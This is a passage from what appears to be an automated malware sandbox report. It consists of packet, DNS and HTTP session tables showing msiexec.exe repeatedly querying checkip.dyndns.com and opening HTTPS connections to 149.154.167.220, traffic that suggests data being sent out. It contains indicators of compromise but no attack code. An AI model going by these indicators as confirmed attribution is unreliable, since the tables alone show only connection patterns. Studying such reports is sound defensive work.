| Nov 25, 2024 13:48:07.633213997 CET | 49940 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:07.635771990 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.637032032 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.756242037 CET | 80 | 49935 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.756411076 CET | 49935 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.757092953 CET | 80 | 49945 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:07.757170916 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.757415056 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:07.878997087 CET | 80 | 49945 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:08.902054071 CET | 80 | 49945 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:08.903641939 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:08.903732061 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:08.903819084 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:08.904201984 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:08.904212952 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:08.951678991 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:10.265465021 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:10.267432928 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:10.267456055 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:10.267510891 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:10.267520905 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:10.896081924 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:10.896176100 CET | 443 | 49947 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:10.896239996 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:10.896702051 CET | 49947 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:10.899530888 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:10.900650024 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:11.021378040 CET | 80 | 49945 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:11.021533966 CET | 49945 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:11.021745920 CET | 80 | 49953 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:11.021835089 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:11.022012949 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:11.142874002 CET | 80 | 49953 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:12.164453983 CET | 80 | 49953 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:12.165617943 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:12.165668964 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:12.165740013 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:12.166007996 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:12.166023016 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:12.217242002 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:13.530049086 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:13.532098055 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:13.532125950 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:13.532183886 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:13.532191038 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:14.213813066 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:14.213918924 CET | 443 | 49958 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:14.213984966 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:14.214317083 CET | 49958 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:14.217001915 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:14.218148947 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:14.337317944 CET | 80 | 49953 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:14.337460041 CET | 49953 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:14.338125944 CET | 80 | 49962 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:14.338195086 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:14.338361025 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:14.458287954 CET | 80 | 49962 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:15.517761946 CET | 80 | 49962 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:15.519275904 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:15.519341946 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:15.519433022 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:15.519697905 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:15.519711971 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:15.560982943 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:16.945663929 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:16.947531939 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:16.947613955 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:16.947712898 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:16.947726011 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:17.661823034 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:17.661917925 CET | 443 | 49966 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:17.661993027 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:17.662384987 CET | 49966 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:17.665170908 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:17.666295052 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:17.786362886 CET | 80 | 49962 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:17.786508083 CET | 49962 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:17.787961960 CET | 80 | 49972 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:17.788049936 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:17.788270950 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:17.910583973 CET | 80 | 49972 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:18.932955980 CET | 80 | 49972 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:18.934159040 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:18.934181929 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:18.934236050 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:18.934475899 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:18.934489012 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:18.982876062 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:20.354365110 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:20.356556892 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:20.356585026 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:20.357429028 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:20.357435942 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:21.001475096 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:21.001564026 CET | 443 | 49977 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:21.001627922 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:21.002124071 CET | 49977 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:21.005472898 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:21.006654024 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:21.127327919 CET | 80 | 49972 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:21.127413988 CET | 49972 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:21.127973080 CET | 80 | 49982 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:21.128058910 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:21.128218889 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:21.251502991 CET | 80 | 49982 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:22.273792982 CET | 80 | 49982 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:22.291867018 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:22.291920900 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:22.292002916 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:22.296211958 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:22.296225071 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:22.326652050 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:23.665034056 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:23.666784048 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:23.666810036 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:23.666865110 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:23.666873932 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:24.453367949 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:24.453536987 CET | 443 | 49985 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:24.453625917 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:24.454114914 CET | 49985 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:24.457192898 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:24.458374023 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:24.577975988 CET | 80 | 49982 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:24.578058004 CET | 49982 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:24.578597069 CET | 80 | 49991 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:24.578668118 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:24.586792946 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:24.711671114 CET | 80 | 49991 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:25.785875082 CET | 80 | 49991 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:25.787189960 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:25.787245035 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:25.787322998 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:25.787611961 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:25.787625074 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:25.826672077 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:27.152868032 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:27.154448032 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:27.154480934 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:27.154547930 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:27.154556990 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:27.885844946 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:27.886099100 CET | 443 | 49996 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:27.886169910 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:27.886533022 CET | 49996 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:27.889625072 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:27.890520096 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:28.015860081 CET | 80 | 49991 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:28.015923977 CET | 49991 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:28.016344070 CET | 80 | 50000 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:28.016408920 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:28.016746998 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:28.142776012 CET | 80 | 50000 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:29.166765928 CET | 80 | 50000 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:29.168332100 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:29.168376923 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:29.168433905 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:29.168741941 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:29.168751001 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:29.217283010 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:30.854113102 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:30.872756958 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:30.872792006 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:30.872840881 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:30.872848034 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:31.633845091 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:31.635320902 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:31.635370970 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:31.635720015 CET | 50004 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:31.638657093 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:31.639926910 CET | 50009 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:31.759044886 CET | 80 | 50000 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:31.759150982 CET | 50000 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:31.759818077 CET | 80 | 50009 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:31.759898901 CET | 50009 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:31.760080099 CET | 50009 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:31.883611917 CET | 80 | 50009 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:32.912528038 CET | 80 | 50009 | 193.122.130.0 | 192.168.2.9 |
| Nov 25, 2024 13:48:32.951646090 CET | 50009 | 80 | 192.168.2.9 | 193.122.130.0 |
| Nov 25, 2024 13:48:34.743895054 CET | 50010 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:34.743953943 CET | 443 | 50010 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:34.744020939 CET | 50010 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:34.744303942 CET | 50010 | 443 | 192.168.2.9 | 149.154.167.220 |
| Nov 25, 2024 13:48:34.744324923 CET | 443 | 50010 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:36.151259899 CET | 443 | 50010 | 149.154.167.220 | 192.168.2.9 |
| Nov 25, 2024 13:48:36.201663017 CET | 50010 | 443 | 192.168.2.9 | 149.154.167.220 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 25, 2024 13:47:28.319642067 CET | 63720 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:28.457119942 CET | 53 | 63720 | 1.1.1.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:31.114120960 CET | 56675 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:31.361630917 CET | 53 | 56675 | 1.1.1.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:36.470797062 CET | 55227 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:36.609015942 CET | 53 | 55227 | 1.1.1.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:38.525110006 CET | 51472 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:38.666774988 CET | 53 | 51472 | 1.1.1.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:40.843432903 CET | 56737 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:40.982677937 CET | 53 | 56737 | 1.1.1.1 | 192.168.2.9 |
| Nov 25, 2024 13:47:44.583515882 CET | 49264 | 53 | 192.168.2.9 | 1.1.1.1 |
| Nov 25, 2024 13:47:44.722060919 CET | 53 | 49264 | 1.1.1.1 | 192.168.2.9 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 25, 2024 13:47:28.319642067 CET | 192.168.2.9 | 1.1.1.1 | 0xb0ec | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Nov 25, 2024 13:47:31.114120960 CET | 192.168.2.9 | 1.1.1.1 | 0x2fa | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Nov 25, 2024 13:47:36.470797062 CET | 192.168.2.9 | 1.1.1.1 | 0x2bd0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Nov 25, 2024 13:47:38.525110006 CET | 192.168.2.9 | 1.1.1.1 | 0x315c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Nov 25, 2024 13:47:40.843432903 CET | 192.168.2.9 | 1.1.1.1 | 0x37d6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Nov 25, 2024 13:47:44.583515882 CET | 192.168.2.9 | 1.1.1.1 | 0x1140 | Standard query (0) | A (IP address) | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 25, 2024 13:46:26.219363928 CET | 1.1.1.1 | 192.168.2.9 | 0xa04f | No error (0) | s-part-0035.t-0009.t-msedge.net | CNAME (Canonical name) | IN (0x0001) | false | ||
| Nov 25, 2024 13:46:26.219363928 CET | 1.1.1.1 | 192.168.2.9 | 0xa04f | No error (0) | 13.107.246.63 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:28.457119942 CET | 1.1.1.1 | 192.168.2.9 | 0xb0ec | No error (0) | 172.217.19.174 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:31.361630917 CET | 1.1.1.1 | 192.168.2.9 | 0x2fa | No error (0) | 142.250.181.1 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:36.609015942 CET | 1.1.1.1 | 192.168.2.9 | 0x2bd0 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:38.666774988 CET | 1.1.1.1 | 192.168.2.9 | 0x315c | No error (0) | 172.67.177.134 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:38.666774988 CET | 1.1.1.1 | 192.168.2.9 | 0x315c | No error (0) | 104.21.67.152 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:40.982677937 CET | 1.1.1.1 | 192.168.2.9 | 0x37d6 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false | ||
| Nov 25, 2024 13:47:44.722060919 CET | 1.1.1.1 | 192.168.2.9 | 0x1140 | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.9 | 49859 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:36.736192942 CET | 151 | OUT | |
| Nov 25, 2024 13:47:37.927936077 CET | 320 | IN | |
| Nov 25, 2024 13:47:37.931982994 CET | 127 | OUT | |
| Nov 25, 2024 13:47:38.271902084 CET | 320 | IN | |
| Nov 25, 2024 13:47:40.501069069 CET | 127 | OUT | |
| Nov 25, 2024 13:47:40.839667082 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.9 | 49877 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:43.433701992 CET | 127 | OUT | |
| Nov 25, 2024 13:47:44.581835985 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.9 | 49885 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:47.024539948 CET | 151 | OUT | |
| Nov 25, 2024 13:47:48.429419041 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.9 | 49896 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:50.557024002 CET | 151 | OUT | |
| Nov 25, 2024 13:47:51.699713945 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.9 | 49907 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:53.864502907 CET | 151 | OUT | |
| Nov 25, 2024 13:47:55.006190062 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 5 | 192.168.2.9 | 49915 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:47:57.303009987 CET | 151 | OUT | |
| Nov 25, 2024 13:47:58.452670097 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 6 | 192.168.2.9 | 49925 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:48:00.758322001 CET | 151 | OUT | |
| Nov 25, 2024 13:48:02.204852104 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 7 | 192.168.2.9 | 49935 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:48:04.375278950 CET | 151 | OUT | |
| Nov 25, 2024 13:48:05.517107964 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 8 | 192.168.2.9 | 49945 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:48:07.757415056 CET | 151 | OUT | |
| Nov 25, 2024 13:48:08.902054071 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 9 | 192.168.2.9 | 49953 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
| Timestamp | Bytes transferred | Direction | Data |
|---|---|---|---|
| Nov 25, 2024 13:48:11.022012949 CET | 151 | OUT | |
| Nov 25, 2024 13:48:12.164453983 CET | 320 | IN |
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 10 | 192.168.2.9 | 49962 | 193.122.130.0 | 80 | 6492 | C:\Windows\SysWOW64\msiexec.exe |
